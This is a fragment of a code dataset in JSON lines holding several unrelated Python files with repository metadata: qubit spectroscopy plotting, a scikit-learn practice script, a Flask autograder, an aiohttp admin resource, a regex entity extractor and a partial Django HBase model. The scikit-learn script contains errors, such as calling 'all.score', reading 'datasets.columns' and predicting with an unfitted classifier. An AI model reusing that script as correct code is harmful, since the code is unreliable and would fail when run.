np.size(relative_amplitude_values)\n x_data = np.zeros((number_amplitude_values, num_points))\n y_data = np.zeros((number_amplitude_values, num_points))\n z_data = np.zeros((number_amplitude_values, num_points), dtype=complex)\n slope_array = np.zeros((number_amplitude_values, num_points))\n\n for amp_ind, amplitude in enumerate(relative_amplitude_values):\n spec_path = resonator_spectrum_data[\"qubits\"][qubit][qubit*number_of_qubits+amp_ind]\n spec_path_props = spec_path[\"properties\"]\n\n z_data[amp_ind] = spec_path[\"vector\"]\n\n \n fig = plt.figure()\n fig.suptitle(f\"Qubit {qubit+1}, amplitude [dBm]\", fontsize=font_large)\n plt_extent = [qachannel_center_frequency+spec_path_props[\"startfreq\"],\n qachannel_center_frequency+spec_path_props[\"stopfreq\"],\n np.max(relative_amplitude_values), np.min(relative_amplitude_values)]\n \n plt.imshow(voltage_to_power_dBm(abs(z_data)), aspect = 'auto', extent = plt_extent)\n \n plt.ylabel('Readout amplitude (a.u.)')\n plt.xlabel('Frequency (Hz)')\n plt.colorbar()\n\n plt.show()\n", "repo_name": "asqum/PYQUM", "sub_path": "TEST/BETAsite/RS/ZI_SHFQC/shfqc_resonator_spectroscopy_cw_power.py", "file_name": "shfqc_resonator_spectroscopy_cw_power.py", "file_ext": "py", "file_size_in_byte": 4272, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "zhinst.toolkit.Session", "line_number": 17, "usage_type": "call"}, {"api_name": "zhinst.toolkit.SHFQAChannelMode.SPECTROSCOPY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "zhinst.toolkit.SHFQAChannelMode", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.devnull", "line_number": 100, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.size", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "shfqc_helper.voltage_to_power_dBm", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}]} +{"seq_id": "72524121447", "text": "###Classifiers\n###EDA functions\n#import seaborn as sns\n#sns.heatmap(df.corr(), square=True, cmap='RdYlGn')\n###KNN\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\ndigits = datasets.load_digits()\n#print(digits.DESCR)\n#print(digits.keys())\n#print(digits.images.shape)\n#print(digits.data.shape)\n#plt.imshow(digits.images[1010], cmap=plt.cm.gray_r, interpolation='nearest')\n#plt.show()\n\nX = digits.data\ny = digits.target\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=42, stratify=digits.target)\n\nneighbors = np.arange(1, 9)\ntrain_accuracy = np.empty(len(neighbors))\ntest_accuracy = np.empty(len(neighbors))\n\nfor i, k in enumerate(neighbors):\n knn = KNeighborsClassifier(n_neighbors=k)\n knn.fit(X_train,y_train)\n train_accuracy[i] = knn.score(X_train, y_train)\n test_accuracy[i] = knn.score(X_test, y_test)\n \n# Generate plot\nplt.title('k-NN: Varying Number of Neighbors')\nplt.plot(neighbors, test_accuracy, label = 'Testing Accuracy')\nplt.plot(neighbors, train_accuracy, label = 'Training Accuracy')\nplt.legend()\nplt.xlabel('Number of Neighbors')\nplt.ylabel('Accuracy')\nplt.show()\n#Hyparparameters search###\nfrom sklearn.model_selection import GridSearchCV\n\n# Setup the hyperparameter grid\nknn = KNeighborsClassifier()\nparam_grid = {'n_neighbors': np.arange(1,50)}\nknn_cv = GridSearchCV(knn, param_grid, cv=5)\nknn_cv.fit(X_train, y_train)\nprint(\"Tuned knn: {}\".format(knn_cv.best_params_))\nprint(\"Best score is {}\".format(knn_cv.best_score_))\n\n#Metrics of the Classifier###\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\n\ny_pred = knn.predict(X_test)\n\n# Generate the confusion matrix and classification report\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n\n\n###Regressions\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\ndf = pd.read_csv('gapminder.csv')\n\ny = df['life'].values\nX = df['fertility'].values\n\ny = y.reshape(-1, 1)\nX = X.reshape(-1, 1)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state=42)\n\nreg = LinearRegression()\nprediction_space = np.linspace(min(X), max(X)).reshape(-1,1)\n\nreg.fit(X_train, y_train)\ny_pred = reg.predict(prediction_space)\nprint(reg.score(X, y))\nplt.plot(prediction_space, y_pred, color='black', linewidth=3)\nplt.show()\n\ny_pred = reg.predict(X_test)\n\n# Compute and print R^2 and RMSE\nprint(\"R^2: {}\".format(all.score(X_test, y_test)))\nrmse = np.sqrt(mean_squared_error(y_test, y_pred))\nprint(\"Root Mean Squared Error: {}\".format(rmse))\n\n###K-fold cross validation\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import cross_val_score\nreg = LinearRegression()\ncv_scores = cross_val_score(reg,X,y,cv=5)\n\nprint(cv_scores)\nprint(\"Average 5-Fold CV Score: {}\".format(np.mean(cv_scores)))\n\n###Reguralization\n#Lasso\nfrom sklearn.linear_model import Lasso\nlasso = Lasso(alpha=0.4,normalize=True)\nlasso.fit(X , y)\nlasso_coef =lasso.coef_ \nprint(lasso_coef)\n\n# Plot the coefficients\nplt.plot(range(len(datasets.columns)), lasso_coef)\nplt.xticks(range(len(datasets.columns)), datasets.columns.values, rotation=60)\nplt.margins(0.02)\nplt.show()\n\n#Regularization II: Ridge\nfrom sklearn.linear_model import Ridge\nfrom sklearn.model_selection import cross_val_score\n\nalpha_space = np.logspace(-4, 0, 50)\nridge_scores = []\nridge_scores_std = []\nridge = Ridge(normalize=True)\n\nfor alpha in alpha_space:\n ridge.alpha = alpha\n ridge_cv_scores = cross_val_score(ridge, X, y, cv=10)\n ridge_scores.append(np.mean(ridge_cv_scores))\n ridge_scores_std.append(np.std(ridge_cv_scores))\n\n#display_plot(ridge_scores, ridge_scores_std)\n####Regularization ELASTIC NET a∗L1+b∗L2\n # Import necessary modules\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\n\n# Create train and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.4, random_state=42)\n\n# Create the hyperparameter grid\nl1_space = np.linspace(0, 1, 30)\nparam_grid = {'l1_ratio': l1_space}\n\nelastic_net = ElasticNet()\n\n# Setup the GridSearchCV object: gm_cv\ngm_cv = GridSearchCV(elastic_net, param_grid, cv=5)\ngm_cv.fit(X_train, y_train)\ny_pred = gm_cv.predict(X_test)\nr2 = gm_cv.score(X_test, y_test)\nmse = mean_squared_error(y_test, y_pred)\nprint(\"Tuned ElasticNet l1 ratio: {}\".format(gm_cv.best_params_))\nprint(\"Tuned ElasticNet R squared: {}\".format(r2))\nprint(\"Tuned ElasticNet MSE: {}\".format(mse))\n", "repo_name": "AntonYurievNikolov/PythonTests", "sub_path": "Data Camp ML courses/Supervised and Pipes/Supervised with scikit-learn .py", "file_name": "Supervised with scikit-learn .py", "file_ext": "py", "file_size_in_byte": 4849, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.datasets.load_digits", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 12, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 79, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 100, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "sklearn.datasets.columns", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "sklearn.datasets.columns", "line_number": 116, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "numpy.logspace", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 133, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.linear_model.ElasticNet", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 153, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 157, "usage_type": "call"}]} +{"seq_id": "9763555449", "text": "import os\nimport sys\nimport pickle\nimport urllib.request\nDIR_PATH = os.path.dirname(os.path.realpath(__file__)) # NOQA\nsys.path.append(DIR_PATH) # NOQA\n\nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\n\nfrom logging_config import logger\nfrom autograder import autograde, check_flake8\nfrom utils import make_dirs\n\n\napp = Flask(__name__)\nCORS(app)\n\nTASK_NUM = 8\n\n\n@app.route('/hi', methods=['GET'])\ndef hi():\n return jsonify(\n {\"message\": \"Hi! This is the server for Introduction to Computer.\"})\n\n\ndef get_data_and_ans_paths():\n public_data_filename = os.path.join(\n DIR_PATH, 'test_data', 'public_data.yaml')\n public_ans_filename = os.path.join(\n DIR_PATH, 'test_data', 'public_answers.yaml')\n\n private_data_filename = os.path.join(\n DIR_PATH, 'test_data', 'private_data.yaml')\n private_ans_filename = os.path.join(\n DIR_PATH, 'test_data', 'private_answers.yaml')\n\n # Dowonload private data\n try:\n private_data_url = os.environ.get('PRIVATE_DATA_URL')\n urllib.request.urlretrieve(private_data_url, private_data_filename)\n private_ans_url = os.environ.get('PRIVATE_ANS_URL')\n urllib.request.urlretrieve(private_ans_url, private_ans_filename)\n except Exception as err:\n logger.info(err, exc_info=True)\n\n return (\n public_data_filename, public_ans_filename,\n private_data_filename, private_ans_filename\n )\n\n\ndef grade():\n '''\n Get test results of all students in src/students/\n '''\n # Save results to a dict\n results = {}\n\n student_ids = os.listdir(os.path.join(DIR_PATH, 'students'))\n student_ids = [x[:-3] for x in student_ids if x[-3:] == '.py']\n for student_id in student_ids:\n student_result = {}\n\n (public_data_filename, public_ans_filename, private_data_filename,\n private_ans_filename) = get_data_and_ans_paths()\n # Test public data\n try:\n logger.info(\"Testing public data\")\n student_result['public_scores'] = autograde(\n student_id, range(1, TASK_NUM + 1),\n public_data_filename, public_ans_filename\n )\n student_result['import'] = \"Success\"\n except Exception as err:\n logger.info(err, exc_info=True)\n student_result['import'] = \"Failed\"\n\n # Test private data\n try:\n logger.info(\"Testing private data\")\n student_result['private_scores'] = autograde(\n student_id, range(1, TASK_NUM + 1),\n private_data_filename,\n private_ans_filename\n )\n except Exception as err:\n logger.info(err, exc_info=True)\n\n # Check flake8\n student_file = os.path.join(DIR_PATH, 'students', student_id + '.py')\n student_result['flake8'] = check_flake8(student_file)\n\n # Add to all results\n results[student_id] = student_result\n return {\n \"results\": results,\n \"task_num\": TASK_NUM,\n \"student_num\": len(student_ids)\n }\n\n\n@app.route('/get_results', methods=['GET'])\ndef get_results():\n return jsonify(results)\n\n\n# Dump results out offline to prevent servertimeout\nresults_dir = os.path.join(DIR_PATH, 'results')\nmake_dirs(results_dir)\nresults_filename = os.path.join(results_dir, 'results.pickle')\nif os.path.exists(results_filename):\n with open(results_filename, 'rb') as fin:\n results = pickle.load(fin)\nelse:\n results = grade()\n with open(results_filename, 'wb') as fout:\n pickle.dump(results, fout)\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "amjltc295/PythonHomework", "sub_path": "src/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 3611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 41, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 41, "usage_type": "attribute"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 42, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 42, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 42, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 44, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 44, "usage_type": "name"}, {"api_name": "logging_config.logger.info", "line_number": 46, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 46, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "logging_config.logger.info", "line_number": 70, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 70, "usage_type": "name"}, {"api_name": "autograder.autograde", "line_number": 71, "usage_type": "call"}, {"api_name": "logging_config.logger.info", "line_number": 77, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 77, "usage_type": "name"}, {"api_name": "logging_config.logger.info", "line_number": 82, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 82, "usage_type": "name"}, {"api_name": "autograder.autograde", "line_number": 83, "usage_type": "call"}, {"api_name": "logging_config.logger.info", "line_number": 89, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "autograder.check_flake8", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "utils.make_dirs", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 115, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "11110242077", "text": "from abc import abstractmethod, ABCMeta\n\nfrom .security import Permissions, require\nfrom .utils import json_response, validate_query\n\n\nclass AbstractResource(metaclass=ABCMeta):\n\n def __init__(self, *, primary_key, resource_name=None):\n class_name = self.__class__.__name__.lower()\n self._resource_name = resource_name or class_name\n self._primary_key = primary_key\n\n @property\n def primary_key(self):\n return self._primary_key\n\n @abstractmethod\n async def list(self, request): # pragma: no cover\n await require(request, Permissions.view)\n q = validate_query(request.GET)\n assert q\n\n # total number of results should be supplied in separate\n headers = {'X-Total-Count': str(0)}\n return json_response({}, headers=headers)\n\n @abstractmethod\n async def detail(self, request): # pragma: no cover\n await require(request, Permissions.view)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n @abstractmethod\n async def create(self, request): # pragma: no cover\n await require(request, Permissions.add)\n return json_response({})\n\n @abstractmethod\n async def update(self, request): # pragma: no cover\n await require(request, Permissions.edit)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n @abstractmethod\n async def delete(self, request): # pragma: no cover\n await require(request, Permissions.delete)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n def setup(self, app, base_url):\n url = str(base_url / self._resource_name)\n url_id = url + '/{entity_id}'\n add_route = app.router.add_route\n add_route('GET', url, self.list)\n add_route('GET', url_id, self.detail)\n add_route('POST', url, self.create)\n add_route('PUT', url_id, self.update)\n add_route('DELETE', url_id, self.delete)\n", "repo_name": "roscopecoltran/sniperkit-services", "sub_path": "dockerfiles/front-end/admin-interface/aiohttp/admin-elastic/sps/aiohttp_admin/resource.py", "file_name": "resource.py", "file_ext": "py", "file_size_in_byte": 2071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABCMeta", "line_number": 7, "usage_type": "name"}, {"api_name": "security.require", "line_number": 20, "usage_type": "call"}, {"api_name": "security.Permissions.view", "line_number": 20, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 20, "usage_type": "name"}, {"api_name": "utils.validate_query", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.json_response", "line_number": 26, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 18, "usage_type": "name"}, {"api_name": "security.require", "line_number": 30, "usage_type": "call"}, {"api_name": "security.Permissions.view", "line_number": 30, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 30, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 33, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 28, "usage_type": "name"}, {"api_name": "security.require", "line_number": 37, "usage_type": "call"}, {"api_name": "security.Permissions.add", "line_number": 37, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 37, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 38, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 35, "usage_type": "name"}, {"api_name": "security.require", "line_number": 42, "usage_type": "call"}, {"api_name": "security.Permissions.edit", "line_number": 42, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 42, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 45, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 40, "usage_type": "name"}, {"api_name": "security.require", "line_number": 49, "usage_type": "call"}, {"api_name": "security.Permissions.delete", "line_number": 49, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 49, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 52, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "3221604569", "text": "from io import StringIO\nfrom fastapi import Depends\nimport pandas as pd\nimport re\n\nfrom api.crud.crud import create_excerpt_metadata, create_named_entity\nfrom api.model.schemas import ExcerptMetadataCreate, NamedEntityCreate\n\nfrom database.connection import SessionLocal\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\ndef find_regex(id:str, text:str) -> list:\n docs=[]\n cnt=0\n\n url_extract_pattern = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n mail_extract_pattern = \"([a-z0-9_.-]+@[a-z0-9_.-]+)\"\n cpf_extract_pattern = \"\\d{3}\\.?\\d{3}\\.?\\d{3}\\-?\\d{2}\"\n cnpj_extract_pattern = \"\\d{2}\\.?\\d{3}\\.?\\d{3}\\/\\d{4}-\\d{2}\"\n\n for url in re.finditer(url_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': url.group(),\n 'start_offset': url.start(),\n 'end_offset': url.start() + len(url.group()),\n 'entity_type':\"URL\"})\n\n for email in re.finditer(mail_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': email.group(),\n 'start_offset': email.start(),\n 'end_offset': email.start() + len(email.group()),\n 'entity_type':\"E-mail\"})\n\n for cpf in re.finditer(cpf_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': cpf.group(),\n 'start_offset': cpf.start(),\n 'end_offset': cpf.start() + len(cpf.group()),\n 'entity_type':\"CPF\"})\n\n for cnpj in re.finditer(cnpj_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': cnpj.group(),\n 'start_offset': cnpj.start(),\n 'end_offset': cnpj.start() + len(cnpj.group()),\n 'entity_type':\"CNPJ\"})\n\n #if docs != []:\n # print(docs)\n #return docs\n\n return docs if docs else []\n\ndef execute_csv_regex(file):\n\n contents = file.file.read()\n s = str(contents,'utf-8')\n data = StringIO(s)\n df = pd.read_csv(data)\n\n count_excerpt = 0\n count_named_entities = 0\n for index, row in df.iterrows():\n\n result = str(row['excerpt']).replace('- ', '')\n docs = find_regex(row['excerpt_id'], result)\n excerpt_metadata = ExcerptMetadataCreate(excerpt_id=row['excerpt_id'], uf=row['source_state_code'], cidade=row['source_territory_name'], tema=row['excerpt_subthemes'], data=row['source_created_at'])\n db_gen = get_db()\n db = next(db_gen)\n count_excerpt+=1 if (create_excerpt_metadata(db, excerpt_metadata)) else False\n if len(docs) > 0:\n for name in docs:\n item = NamedEntityCreate(excerpt_id=name['excerpt_id'], content=name['content'], start_offset=name['start_offset'], end_offset=name['end_offset'], entity_type=name['entity_type'])\n\n count_named_entities+=1 if (create_named_entity(db, item)) else False\n\n return \"Saved \" + str(count_excerpt) + \" excerpt ids and \" + str(count_named_entities) + \" named entitites\"", "repo_name": "MLRG-CEFET-RJ/qdrec", "sub_path": "scripts/append_regex.py", "file_name": "append_regex.py", "file_ext": "py", "file_size_in_byte": 3322, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "database.connection.SessionLocal", "line_number": 12, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 27, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 36, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 45, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 54, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 74, "usage_type": "call"}, {"api_name": "api.model.schemas.ExcerptMetadataCreate", "line_number": 82, "usage_type": "call"}, {"api_name": "api.crud.crud.create_excerpt_metadata", "line_number": 85, "usage_type": "call"}, {"api_name": "api.model.schemas.NamedEntityCreate", "line_number": 88, "usage_type": "call"}, {"api_name": "api.crud.crud.create_named_entity", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "70418882410", "text": "from .exceptions import EmptyColumnError, BadRowKeyError\nfrom .fields import HBaseField, IntegerField, TimestampField\nfrom django.conf import settings\nfrom django_hbase.client import HBaseClient\n\nclass HBaseModel:\n\n class Meta:\n table_name = None\n row_key = () # None\n\n @classmethod\n def get_table(cls):\n conn = HBaseClient.get_connection()\n return conn.table(cls.get_table_name())\n\n @property\n def row_key(self):\n return self.serialize_row_key(self.__dict__)\n\n @classmethod\n def get_field_hash(cls):\n field_hash = {}\n for field in cls.__dict__:\n field_obj = getattr(cls, field)\n # 可以写成 for field, field_obj in cls.__dict__.items() 吗?\n if isinstance(field_obj, HBaseField):\n field_hash[field] = field_obj\n return field_hash\n\n def __init__(self, **kwargs):\n for key, field in self.get_field_hash().items():\n value = kwargs.get(key)\n setattr(self, key, value)\n\n @classmethod\n def init_from_row(cls, row_key, row_data):\n if not row_data:\n return None\n data = cls.deserialize_row_key(row_key)\n for column_key, column_value in row_data.items():\n # remove column family\n column_key = column_key.decode('utf-8')\n key = column_key[column_key.find(':') + 1:]\n data[key] = cls.deserialize_field(key, column_value)\n return cls(**data)\n\n @classmethod\n def serialize_row_key(cls, data, is_prefix=False):\n \"\"\"\n serialize dict to bytes (not str)\n {key1: val1} => b\"val1\"\n 